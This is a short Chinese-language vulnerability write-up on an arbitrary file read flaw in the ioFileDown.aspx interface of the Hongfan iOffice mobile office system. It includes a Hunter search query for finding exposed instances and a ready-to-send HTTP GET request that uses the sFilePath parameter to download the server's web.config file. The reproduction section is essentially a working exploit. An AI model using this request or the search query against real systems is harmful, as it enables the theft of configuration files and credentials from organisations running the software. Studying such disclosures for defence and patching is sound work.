红帆iOffice ioFileDown任意文件读取漏洞
一、漏洞简介
红帆iOffice移动办公系统,是广州红帆电脑科技有限公司基于微软.NET技术研发的,建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合,推出红帆iOffice移动办公系统,实现任何办公地点和办公时间的无缝接入,提高办公效率。红帆iOffice可接入原有的iOffice.net办公平台,用户即可以用PC管理自己的OA桌面,也可以通过移动设备(WAP手机、3G智能手机、IPAD平板电脑)访问OA系统,继续操作、浏览、管理公司的全部工作事务,ioFileDown接口处存在任意文件读取漏洞,会导致敏感数据泄露。
二、影响版本
- 红帆iOffice
三、资产测绘
- hunter
app.name="红帆 iOffice" - 特征
四、漏洞复现
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=/ioffice/web.config HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=mk5u2m451nndfi55jwriqwyc
Upgrade-Insecure-Requests: 1